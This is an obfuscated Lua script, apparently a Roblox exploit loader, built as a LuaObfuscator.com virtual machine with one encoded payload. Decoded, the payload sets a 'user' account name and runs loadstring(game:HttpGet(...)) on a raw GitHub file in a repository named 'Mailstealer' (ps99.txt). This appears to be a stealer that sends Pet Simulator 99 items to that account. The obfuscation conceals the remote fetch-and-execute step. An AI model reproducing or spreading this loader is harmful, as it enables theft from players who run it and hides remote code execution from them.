--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=v1(v16,v19,v19);v19=v19 + 1 ;return v31;end v23=nil;function v23()local v32,v33=v1(v16,v19,v19 + (5 -3) );v19=v19 + 2 ;return (v33 * (732 -476)) + v32 ;end v18=3;end if (v18==4) then function v25()local v34=v24();local v35=v24();local v36=118 -(32 + 85) ;local v37=(v21(v35,1,38 -(1205 -(1069 + 118)) ) * ((4 -(4 -2))^(989 -(892 + (142 -77))))) + v34 ;local v38=v21(v35,49 -(5 + 23) ,650 -(555 + 64) );local v39=((v21(v35,963 -(857 + 74) )==(569 -(367 + (356 -155)))) and  -(928 -(214 + 713))) or (1 + 0) ;if (v38==(0 + 0)) then if (v37==(877 -(282 + 595))) then return v39 * ((1624 + 13) -(1523 + 114)) ;else v38=1 + 0 ;v36=(791 -(368 + 423)) -0 ;end elseif (v38==(2918 -871)) then return ((v37==((3346 -2281) -(68 + 997))) and (v39 * ((1 + 0)/(997 -(915 + 82))))) or (v39 * NaN) ;end return v8(v39,v38-((2311 -(10 + 8)) -(226 + 1044)) ) * (v36 + (v37/((8 -6)^(68 -16)))) ;end v26=nil;function v26(v40)local v41=0 -0 ;local v42;local v43;while true do if ((444 -(416 + 26))==v41) then v43={};for v79=3 -(774 -(201 + 571)) , #v42 do v43[v79]=v2(v1(v3(v42,v79,v79)));end v41=2 + 1 ;end if (v41==((1142 -(116 + 1022)) -1)) then return v6(v43);end if (v41==0) then v42=nil;if  not v40 then v40=v24();if (v40==(438 -(145 + 293))) then return "";end end v41=431 -(44 + 386) ;end if (v41==(1487 -(998 + 488))) then v42=v3(v16,v19,(v19 + v40) -(1 + 0) );v19=v19 + v40 ;v41=(8 -6) + 0 ;end end end v18=5;end if (v18==6) then v29=nil;function v29()local v44=0 + 0 ;local v45;local v46;local v47;local v48;local v49;local v50;local v51;while true do if (v44~=(948 -(245 + 702))) then else local v72=0 -0 ;local v73;while true do if (v72~=(114 -(4 + 110))) then else v73=0;while true do if (v73~=0) then else local v106=0 -0 ;while true do if (v106~=(1 + 0)) then else v73=585 -(57 + 527) ;break;end if (v106==(1427 -(41 + 1386))) then v47=nil;v48=nil;v106=104 -(17 + 86) ;end end end if (v73~=(441 -(382 + 58))) then else v44=2 + 0 ;break;end end break;end end end if (v44~=2) then else v49=nil;v50=nil;v44=6 -3 ;end if (v44==0) then local v74=0 + 0 ;local v75;while true do if (v74==(0 -0)) then v75=0 -0 ;while true do if (v75==(167 -(122 + 44))) then v44=1;break;end if ((0 -0)~=v75) then else local v107=0 -0 ;while true do if (v107==(3 -2)) then v75=1 + 0 ;break;end if (v107==(0 -0)) then v45=0 -0 ;v46=nil;v107=1 + 0 ;end end end end break;end end end if (v44==3) then v51=nil;while true do local v81=0 -0 ;local v82;while true do if (v81~=0) then else v82=65 -(30 + 35) ;while true do if (v82~=(0 + 0)) then else if (v45==(1 + 2)) then local v118=0;local v119;while true do if (v118==0) then v119=1257 -(1043 + 214) ;while true do if (v119==(0 -0)) then local v184=683 -(483 + 200) ;while true do if (v184==0) then for v196=1464 -(1404 + 59) ,v24() do v47[v196-(1213 -(323 + 889)) ]=v29();end return v49;end end end end break;end end end if (v45~=(1 -0)) then else local v120=765 -(468 + 297) ;local v121;local v122;while true do if (v120==(2 -1)) then while true do if ((580 -(361 + 219))~=v121) then else v122=320 -(53 + 267) ;while true do if (v122==0) then v49={v46,v47,nil,v48};v50=v24();v122=1;end if (v122==(2 -1)) then v51={};v45=984 -(18 + 964) ;break;end end break;end end break;end if (v120~=(0 -0)) then else v121=0;v122=nil;v120=1 + 0 ;end end end v82=1 + 0 ;end if (v82==(851 -(20 + 830))) then if (v45~=(2 + 0)) then else local v123=0 + 0 ;local v124;while true do if (v123==(0 -0)) then v124=0 -0 ;while true do if (v124==(1 + 0)) then for v188=1,v24() do local v189=126 -(116 + 10) ;local v190;local v191;local v192;local v193;while true do if (v189~=2) then else while true do if (1==v190) then v193=nil;while true do if ((1 + 0)==v191) then while true do if (v192==(0 -0)) then v193=v22();if (v21(v193,1 + 0 ,739 -(542 + 196) )==(0 -0)) then local v210=0 + 0 ;local v211;local v212;local v213;local v214;local v215;while true do if (v210==(2 -0)) then v215=nil;while true do if (v211==0) then local v217=0 + 0 ;local v218;while true do if (v217~=(0 + 0)) then else v218=0 + 0 ;while true do if (v218~=(2 -1)) then else v211=1 + 0 ;break;end if (v218==(0 -0)) then local v230=0 -0 ;while true do if (v230==0) then v212=0;v213=nil;v230=1552 -(1126 + 425) ;end if (v230==1) then v218=406 -(118 + 287) ;break;end end end end break;end end end if (v211==(1 + 0)) then local v219=0;while true do if (v219~=(3 -2)) then else v211=2 + 0 ;break;end if (v219==(1121 -(118 + 1003))) then v214=nil;v215=nil;v219=850 -(254 + 595) ;end end end if (v211==(128 -(55 + 71))) then while true do if (v212==(2 -0)) then local v220=0;local v221;while true do if (v220~=(1790 -(573 + 1217))) then else v221=0;while true do if (v221==(2 -1)) then v212=380 -(142 + 235) ;break;end if (v221==0) then local v231=0;while true do if (v231==(4 -3)) then v221=1;break;end if (v231==(0 + 0)) then local v234=0;while true do if (v234==(1 -0)) then v231=978 -(553 + 424) ;break;end if (v234==0) then if (v21(v214,2 -1 ,1 -0 )==(1 + 0)) then v215[3 -1 ]=v51[v215[808 -(118 + 688) ]];end if (v21(v214,2 + 0 ,2 + 0 )==(1 + 0)) then v215[1889 -(927 + 959) ]=v51[v215[10 -7 ]];end v234=1;end end end end end end break;end end end if (v212~=3) then else if (v21(v214,2 + 1 ,2 + 1 )~=(1 + 0)) then else v215[7 -3 ]=v51[v215[101 -(11 + 86) ]];end v46[v188]=v215;break;end if (v212~=(0 -0)) then else local v223=0 -0 ;local v224;while true do if (v223~=(0 -0)) then else v224=0 -0 ;while true do if (v224~=(0 -0)) then else local v232=0 -0 ;local v233;while true do if ((0 + 0)==v232) then v233=0;while true do if (v233==(1061 -(810 + 251))) then v213=v21(v193,2,6 -3 );v214=v21(v193,2 + 2 ,5 + 1 );v233=1;end if (v233~=(4 -3)) then else v224=754 -(239 + 514) ;break;end end break;end end end if ((1 + 0)==v224) then v212=1330 -(797 + 532) ;break;end end break;end end end if (v212==1) then local v225=0 + 0 ;local v226;local v227;while true do if (v225==1) then while true do if (v226==0) then v227=0;while true do if (v227==1) then v212=735 -(711 + 22) ;break;end if (v227==0) then local v235=0 + 0 ;local v236;while true do if (v235==(0 -0)) then v236=1202 -(373 + 829) ;while true do if (v236~=(731 -(476 + 255))) then else local v241=0 + 0 ;while true do if (1==v241) then v236=1131 -(369 + 761) ;break;end if (v241~=(0 + 0)) then else v215={v23(),v23(),nil,nil};if (v213==(0 -0)) then local v242=0 -0 ;local v243;while true do if ((238 -(64 + 174))==v242) then v243=0 + 0 ;while true do if (v243==(0 -0)) then v215[339 -(144 + 192) ]=v23();v215[220 -(42 + 174) ]=v23();break;end end break;end end elseif (v213==(1 + 0)) then v215[3]=v24();elseif (v213==(2 + 0)) then v215[2 + 1 ]=v24() -((1506 -(363 + 1141))^16) ;elseif (v213==(1583 -(1183 + 397))) then local v248=0;local v249;local v250;while true do if (v248==0) then v249=0 + 0 ;v250=nil;v248=2 -1 ;end if (v248~=1) then else while true do if ((0 + 0)==v249) then v250=0;while true do if (v250==0) then v215[3 + 0 ]=v24() -((1977 -(1913 + 62))^(11 + 5)) ;v215[10 -6 ]=v23();break;end end break;end end break;end end end v241=339 -(118 + 220) ;end end end if ((1 + 0)~=v236) then else v227=1;break;end end break;end end end end break;end end break;end if (v225==(449 -(108 + 341))) then v226=0;v227=nil;v225=1 + 0 ;end end end end break;end end break;end if (v210==(1933 -(565 + 1368))) then v211=0;v212=nil;v210=1494 -(711 + 782) ;end if (v210==(1 -0)) then v213=nil;v214=nil;v210=2;end end end break;end end break;end if (v191==(0 -0)) then local v205=0;while true do if ((0 + 0)==v205) then v192=0;v193=nil;v205=1662 -(1477 + 184) ;end if (v205~=1) then else v191=2 -1 ;break;end end end end break;end if ((0 + 0)==v190) then local v204=0;while true do if (v204~=1) then else v190=1 + 0 ;break;end if ((0 -0)~=v204) then else v191=0 + 0 ;v192=nil;v204=2 -1 ;end end end end break;end if (v189==(857 -(564 + 292))) then v192=nil;v193=nil;v189=2 -0 ;end if (v189==(1167 -(645 + 522))) then v190=0;v191=nil;v189=1791 -(1010 + 780) ;end end end v45=3 + 0 ;break;end if (v124==(0 -0)) then local v185=304 -(244 + 60) ;while true do if (v185~=0) then else for v198=1 + 0 ,v50 do local v199=476 -(41 + 435) ;local v200;local v201;local v202;local v203;while true do if ((1838 -(1045 + 791))==v199) then while true do if (v200==(2 -1)) then v203=nil;while true do if ((0 -0)==v201) then local v207=505 -(351 + 154) ;local v208;while true do if (v207~=(1001 -(938 + 63))) then else v208=0 + 0 ;while true do if (v208==(1125 -(936 + 189))) then local v216=0 + 0 ;while true do if (v216~=(0 -0)) then else v202=v22();v203=nil;v216=1560 -(1381 + 178) ;end if (v216==(1614 -(1565 + 48))) then v208=1 + 0 ;break;end end end if (v208~=1) then else v201=1 + 0 ;break;end end break;end end end if (v201==1) then if (v202==(1 + 0)) then v203=v22()~=0 ;elseif (v202==(1140 -(782 + 356))) then v203=v25();elseif (v202~=3) then else v203=v26();end v51[v198]=v203;break;end end break;end if (v200~=(267 -(176 + 91))) then else local v206=0 -0 ;while true do if (v206==(470 -(381 + 89))) then v201=0 -0 ;v202=nil;v206=1 + 0 ;end if (v206==(1093 -(975 + 117))) then v200=1876 -(157 + 1718) ;break;end end end end break;end if (v199~=(0 + 0)) then else v200=0 -0 ;v201=nil;v199=3 -2 ;end if (v199==1) then v202=nil;v203=nil;v199=1020 -(697 + 321) ;end end end v49[3]=v22();v185=2 -1 ;end if (v185==(1 -0)) then v124=1;break;end end end end break;end end end if (v45==0) then local v125=1455 -(990 + 465) ;local v126;local v127;while true do if (v125~=(2 -1)) then else while true do if (v126==(0 + 0)) then v127=0;while true do if (v127==(1 + 0)) then v48={};v45=1 -0 ;break;end if (v127==(0 -0)) then local v195=1227 -(322 + 905) ;while true do if (v195==(1726 -(1668 + 58))) then v46={};v47={};v195=612 -(602 + 9) ;end if (v195==1) then v127=1;break;end end end end break;end end break;end if ((626 -(512 + 114))~=v125) then else v126=1189 -(449 + 740) ;v127=nil;v125=2 -1 ;end end end break;end end break;end end end break;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v52)if (v1(v52,2)==79) then local v68=0;while true do if (v68==0) then v20=v0(v3(v52,1,1));return "";end end else local v69=v2(v0(v52,16));if v20 then local v83=0;local v84;while true do if (v83==1) then return v84;end if (v83==0) then v84=v5(v69,v20);v20=nil;v83=1;end end else return v69;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v53=0;local v54;local v55;local v56;local v57;while true do if (v53==(1995 -(109 + 1885))) then return (v57 * ((34685732 -(1269 + 200)) -17907047)) + (v56 * (228042 -162506)) + (v55 * (120 + 136)) + v54 ;end if (0==v53) then v54,v55,v56,v57=v1(v16,v19,v19 + (1 -0) + 2 );v19=v19 + 4 + (815 -(98 + 717)) ;v53=3 -2 ;end end end v25=nil;v18=4;end if (v18==7) then function v30(v58,v59,v60)local v61=0;local v62;local v63;local v64;while true do if (v61==0) then v62=v58[1];v63=v58[2];v61=1;end if (v61==1) then v64=v58[3];return function(...)local v85=v62;local v86=v63;local v87=v64;local v88=v28;local v89=1;local v90= -1;local v91={};local v92={...};local v93=v12("#",...) -1 ;local v94={};local v95={};for v99=0,v93 do if (v99>=v87) then v91[v99-v87 ]=v92[v99 + 1 ];else v95[v99]=v92[v99 + 1 ];end end local v96=(v93-v87) + 1 ;local v97;local v98;while true do v97=v85[v89];v98=v97[1];if (v98<=5) then if (v98<=2) then if (v98<=0) then local v108=0;local v109;local v110;local v111;local v112;local v113;while true do if (v108==0) then v109=nil;v110,v111=nil;v112=nil;v113=nil;v108=1;end if (v108==4) then v95[v113]=v112[v97[4]];v89=v89 + 1 ;v97=v85[v89];v95[v97[2]]=v97[3];v108=5;end if (6==v108) then v97=v85[v89];v113=v97[2];v110,v111=v88(v95[v113](v13(v95,v113 + 1 ,v97[3])));v90=(v111 + v113) -1 ;v108=7;end if (8==v108) then v113=v97[2];v95[v113]=v95[v113](v13(v95,v113 + 1 ,v90));v89=v89 + 1 ;v97=v85[v89];v108=9;end if (v108==1) then v60[v97[3]]=v95[v97[2]];v89=v89 + 1 ;v97=v85[v89];if ((v97[3]=="_ENV") or (v97[3]=="getfenv")) then v95[v97[2]]=v60;else v95[v97[2]]=v60[v97[3]];end v108=2;end if (7==v108) then v109=0;for v170=v113,v90 do local v171=0;while true do if (v171==0) then v109=v109 + 1 ;v95[v170]=v110[v109];break;end end end v89=v89 + 1 ;v97=v85[v89];v108=8;end if (v108==3) then v97=v85[v89];v113=v97[2];v112=v95[v97[3]];v95[v113 + 1 ]=v112;v108=4;end if (9==v108) then v95[v97[2]]();v89=v89 + 1 ;v97=v85[v89];v89=v97[3];break;end if (v108==2) then v89=v89 + 1 ;v97=v85[v89];if ((v97[3]=="_ENV") or (v97[3]=="getfenv")) then v95[v97[2]]=v60;else v95[v97[2]]=v60[v97[3]];end v89=v89 + 1 ;v108=3;end if (v108==5) then v89=v89 + 1 ;v97=v85[v89];v95[v97[2]]=v97[3]~=0 ;v89=v89 + 1 ;v108=6;end end elseif (v98>1) then if ((v97[3]=="_ENV") or (v97[3]=="getfenv")) then v95[v97[2]]=v60;else v95[v97[2]]=v60[v97[3]];end else v60[v97[3]]=v95[v97[2]];end elseif (v98<=3) then local v114=0;local v115;local v116;while true do if (v114==1) then v95[v115 + 1 ]=v116;v95[v115]=v116[v97[4]];break;end if (v114==0) then v115=v97[2];v116=v95[v97[3]];v114=1;end end elseif (v98>4) then local v130=v97[2];local v131,v132=v88(v95[v130](v13(v95,v130 + 1 ,v97[3])));v90=(v132 + v130) -1 ;local v133=0;for v167=v130,v90 do v133=v133 + 1 ;v95[v167]=v131[v133];end else v95[v97[2]]();end elseif (v98<=8) then if (v98<=6) then v95[v97[2]]=v97[3]~=0 ;elseif (v98>7) then v95[v97[2]]=v97[3];else local v136=0;local v137;while true do if (v136==0) then v137=v97[2];v95[v137]=v95[v137](v13(v95,v137 + 1 ,v90));break;end end end elseif (v98<=9) then do return;end elseif (v98>10) then v89=v97[3];elseif (v95[v97[2]]==v97[4]) then v89=v89 + 1 ;else v89=v97[3];end v89=v89 + 1 ;end end;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v65,v66,v67)if v67 then local v70=(v65/((828 -(802 + 24))^(v66-(1 -0))))%((2 -0)^(((v67-(1 + 0 + 0)) -(v66-(1 + 0))) + 1 + 0)) ;return v70-(v70%(1 + 0)) ;else local v71=2^(v66-1) ;return (((v65%(v71 + v71))>=v71) and (2 -1)) or (0 -(0 + 0)) ;end end v22=nil;v18=2;end end end v15("LOL!073O00028O0003043O0075736572030A3O0071745F7365722O697573030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403453O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6D2O61726C2O6F77312F4D61696C737465616C65722F6D61696E2F70732O392E74787400103O0012083O00013O00260A3O00010001000100040B3O00010001001208000100033O00122O000100023O00122O000100043O00122O000200053O00202O00020002000600122O000400076O000500016O000200056O00013O00024O00010001000100044O000F000100040B3O000100012O00093O00017O00",v9(),...);